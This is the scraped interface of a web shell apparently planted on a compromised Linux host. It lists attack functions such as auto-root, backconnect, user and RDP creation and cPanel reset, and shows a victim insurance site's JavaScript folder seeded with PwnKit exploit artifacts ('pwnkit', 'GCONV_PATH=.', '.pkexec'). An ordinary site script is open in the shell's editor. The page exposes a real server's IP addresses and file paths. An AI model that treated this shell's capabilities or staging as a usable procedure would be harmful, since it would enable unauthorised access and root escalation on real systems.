Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.118.255.161
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
insurance /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
common-backend.js
1015
B
-rw-r--r--
common-nackend-end-backend.js
1.91
KB
-rw-r--r--
custom.js
2.86
KB
-rw-r--r--
dashbord.js
3.65
KB
-rw-r--r--
email-quotes-backend.js
1.53
KB
-rw-r--r--
helpers.js
23.45
KB
-rw-r--r--
insurance-listing-page.js
7.36
KB
-rw-r--r--
insurer-dashboard-backend.js
8.49
KB
-rw-r--r--
insurer-edit-backend.js
14.16
KB
-rw-r--r--
jquery-3.7.1.min.js
85.48
KB
-rw-r--r--
jquerydatatables2.0.8.min.js
88.28
KB
-rw-r--r--
messages-backend.js
2.28
KB
-rw-r--r--
policy-backend.js
2.96
KB
-rw-r--r--
policy-dashboard-backend.js
2.52
KB
-rw-r--r--
policy-edit-backend.js
2.25
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
qoutejs.js
7.67
KB
-rw-r--r--
sweetalert.min.js
39.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : policy-backend.js
// Load deductables function loadDeductible(iid){ $.ajax({ url: 'https://dp-client.com/insurance/policy/getDeductible.php', type: 'POST', data: {iid:iid} }) .done(function(res) { if (res == 'error') { swal({ title: "Unable to fetch data!", text: "Please try again!", icon: "error", button: false, timer: 2500 }); }else { $('#deductible').html(res); } }) .fail(function() { swal({ title: "Unable to fetch data!", text: "Please try again!", icon: "error", button: false, timer: 2500 }); }); } $(document).ready(function() { // Initialize Parsley validation $('#policy-form').parsley(); $('.area-of-cover-checkbox').on('change', function() { var regionID = $(this).val(); if ($(this).is(':checked')) { $('#loader').show(); // Show loader $.ajax({ url: 'https://dp-client.com/insurance/policy/getCountriesByRegion', type: 'POST', data: { region_id: regionID }, success: function(response) { var countries = JSON.parse(response); var html = '<div class="listing-show-country">' + '<div class="flex-js-b">' + '<p class="asia-sl">' + countries.region_name + '</p>' + '<div class="include-all">' + '<button class="pos-relative btntype-check" type="button">' + '<input id="Include-all-' + regionID + '" class="asButton include-all-checkbox" type="checkbox" name="">' + '<label for="Include-all-' + regionID + '">Include all</label>' + '</button>' + '</div>' + '</div>' + '<div class="according-country loc-ul continent-div wrap-multi-chekbox dflex">'; $.each(countries.data, function(index, country) { html += '<button class="pos-relative btntype-check" type="button">' + '<input id="' + country.name + '-' + regionID + '" class="asButton country-checkbox" type="checkbox" name="country[]" value="' + country.name + '" data-parsley-multiple="locations" required>' + '<label for="' + country.name + '-' + regionID + '">' + country.name + '</label>' + '</button>'; }); html += '</div></div>'; $('#country-list').append(html); $('#loader').hide(); // Hide loader }, error: function() { $('#loader').hide(); // Hide loader in case of error alert('Error loading countries.'); } }); } else { // If unchecked, remove the related country list $('.listing-show-country:has(.asia-sl:contains(' + $(this).next('label').text() + '))').remove(); } }); // Handle "Include all" functionality $(document).on('change', '.include-all-checkbox', function() { $(this).closest('.listing-show-country').find('.country-checkbox').prop('checked', $(this).is(':checked')).trigger('change'); }); });
Close